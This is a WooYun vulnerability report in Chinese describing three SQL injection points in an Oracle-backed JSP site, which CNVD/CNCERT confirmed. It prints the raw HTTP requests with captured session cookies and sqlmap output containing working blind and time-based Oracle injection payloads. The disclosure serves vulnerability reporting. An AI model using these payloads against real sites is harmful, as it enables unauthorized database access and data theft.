乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
RT
0x01 位置
http://**.**.**.**/
0x02 漏洞详细第一处注入点GET注入
GET /infoCol_list.jsp?strColId=13740498734065767&strColKind=-1&view_type=1
关键字strColKind第二处注入点POST
POST /infoPic_list.jsp HTTP/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: aheiccookie=lMXGWJ5Kbd2xzvF3Kks9kG3vgSWGhGzR4W44qLG0ph6H8lNzt87h!-1028699616; JSESSIONID=xHJPWJ8Y6vNwVDDzJp2v0znVspWRDQnTdkgNwPyPPTlLWB3V42h1!1347620527; ADMINCONSOLESESSION=WVyHWJ6QGS89TYfX5XkNQGC2n6299kTJvTBYHQp8LJqqwtvpZfcN!-1028699616; publicinquiryurls=http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM V2|http://**.**.**.**/inquire!Microsoft|http://**.**.**.**/glue/inquire/uddi!XMethods|; privateinquiryurls=1; privatepublishurls=1; CNZZDATA1000303084=205775825-1448358329-http%253A%252F%252F**.**.**.**%252F%7C1448358329; _gscu_67873558=48360572fynngr16; _gscs_67873558=48360572c1erfx16|pv:1; _gscbrs_67873558=1; pageFontSize=16; contrastState=0; textModeState=0; guidesState=0; toolBarState=1; HMACCOUNT=D8E01DEA126DAFA2; Hm_lvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448360885,1448360952,1448361231,1448361326; Hm_lpvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448361326Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*frmSch=1&keyName=strSource&keyValue=-1&PageSizeIndex=2&strColId=1304408833625000
关键字keyValue第三处注入点POST
POST /info_list.jsp HTTP/1.1Content-Length: 147Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: aheiccookie=lMXGWJ5Kbd2xzvF3Kks9kG3vgSWGhGzR4W44qLG0ph6H8lNzt87h!-1028699616; JSESSIONID=xHJPWJ8Y6vNwVDDzJp2v0znVspWRDQnTdkgNwPyPPTlLWB3V42h1!1347620527; ADMINCONSOLESESSION=WVyHWJ6QGS89TYfX5XkNQGC2n6299kTJvTBYHQp8LJqqwtvpZfcN!-1028699616; publicinquiryurls=http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM V2|http://**.**.**.**/inquire!Microsoft|http://**.**.**.**/glue/inquire/uddi!XMethods|; privateinquiryurls=1; privatepublishurls=1; CNZZDATA1000303084=205775825-1448358329-http%253A%252F%252F**.**.**.**%252F%7C1448358329; _gscu_67873558=48360572fynngr16; _gscs_67873558=48360572c1erfx16|pv:1; _gscbrs_67873558=1; pageFontSize=16; contrastState=0; textModeState=0; guidesState=0; toolBarState=1; HMACCOUNT=D8E01DEA126DAFA2; Hm_lvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448360885,1448360952,1448361231,1448361326; Hm_lpvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448361326Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*frmSch=1&keyName=strMasTitle&keyValue=-1&PageSizeIndex=2&strColId=13739392833284153
关键字keyValue0x03 测试工具sqlmap
第一
---Place: GETParameter: strKeyword Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: strColId=1304409675750001&strKeyword=%' AND 1234=1234 AND '%'='&strLinkColId=&view_type=0 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: strColId=1304409675750001&strKeyword=%' AND 8103=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(100)||CHR(90)||CHR(70),5) AND '%'='&strLinkColId=&view_type=0---[21:14:24] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP 2.1, Nginxback-end DBMS: Oracle[21:14:24] [INFO] fetching current user[21:14:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[21:14:24] [INFO] retrieved: you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] [21:14:27] [WARNING] reflective value(s) found and filtering out[21:14:30] [WARNING] time-based comparison requires larger statistical model, please wait.......................[21:14:39] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [21:14:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user: None[21:14:42] [INFO] fetching current database[21:14:42] [INFO] retrieved: [21:14:46] [INFO] retrieved: [21:14:49] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): None[21:14:49] [INFO] testing if current user is DBAcurrent user is DBA: False[21:14:49] [INFO] fetching database users password hashes[21:14:49] [INFO] fetching database users[21:14:49] [INFO] fetching number of database users[21:14:49] [INFO] retrieved: [21:14:51] [INFO] retrieved: [21:14:52] [CRITICAL] unable to retrieve the number of database users[21:14:52] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[21:14:52] [INFO] fetching database (schema) names[21:14:52] [INFO] fetching number of databases[21:14:52] [INFO] retrieved: [21:14:54] [INFO] retrieved: [21:14:56] [ERROR] unable to retrieve the number of databases[21:14:56] [INFO] falling back to current database[21:14:56] [INFO] fetching current database[21:14:56] [INFO] retrieved: [21:14:59] [INFO] retrieved: [21:15:04] [CRITICAL] unable to retrieve the database names
第二处
---Place: POSTParameter: keyValue Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: frmSch=1&keyName=strSource&keyValue=-1%' AND 9316=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(68)||CHR(119)||CHR(68),5) AND '%'='&PageSizeIndex=2&strColId=1304409675750001&strColKind=&strKeyword=&strLinkColId=---[21:47:30] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP 2.1, Nginxback-end DBMS: Oracle[21:47:30] [INFO] fetching current user[21:47:30] [INFO] resumed: \x05\x05current user: ''[21:47:30] [INFO] fetching current database[21:47:30] [INFO] resumed: \x05\x05[21:47:30] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): ''[21:47:30] [INFO] testing if current user is DBAcurrent user is DBA: False[21:47:30] [INFO] fetching database users password hashes[21:47:30] [INFO] fetching database users[21:47:30] [INFO] fetching number of database users[21:47:30] [WARNING] time-based comparison requires larger statistical model, plyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] ..............................[21:47:47] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[21:47:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [21:47:49] [INFO] retrieved: [21:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[21:47:49] [CRITICAL] unable to retrieve the number of database users[21:47:49] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[21:47:49] [INFO] fetching database (schema) names[21:47:49] [INFO] fetching number of databases[21:47:51] [INFO] retrieved: [21:47:51] [ERROR] unable to retrieve the number of databases[21:47:51] [INFO] falling back to current database[21:47:51] [INFO] fetching current databaseavailable databases [1]:[*]
第三处
---Place: POSTParameter: keyValue Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: frmSch=1&keyName=strMasTitle&keyValue=-1%' AND 9830=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(120)||CHR(109)||CHR(98),5) AND '%'='&PageSizeIndex=2&strColId=13739392833284153---[21:56:55] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP 2.1, Nginxback-end DBMS: Oracle[21:56:55] [INFO] fetching current user[21:56:55] [WARNING] time-based comparison requires larger statistical model, plyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] ..............................[21:57:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [21:57:11] [INFO] retrieved: [21:57:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user: None[21:57:11] [INFO] fetching current database[21:57:12] [INFO] retrieved: [21:57:12] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): None[21:57:12] [INFO] testing if current user is DBAcurrent user is DBA: False[21:57:12] [INFO] fetching database users password hashes[21:57:12] [INFO] fetching database users[21:57:12] [INFO] fetching number of database users[21:57:13] [INFO] retrieved: [21:57:13] [CRITICAL] unable to retrieve the number of database users[21:57:13] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[21:57:13] [INFO] fetching database (schema) names[21:57:13] [INFO] fetching number of databases[21:57:14] [INFO] retrieved: [21:57:14] [ERROR] unable to retrieve the number of databases[21:57:14] [INFO] falling back to current database[21:57:14] [INFO] fetching current database[21:57:16] [INFO] retrieved: [21:57:16] [CRITICAL] unable to retrieve the database names
危害等级:高
漏洞Rank:11
确认时间:2015-12-01 15:23
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。
暂无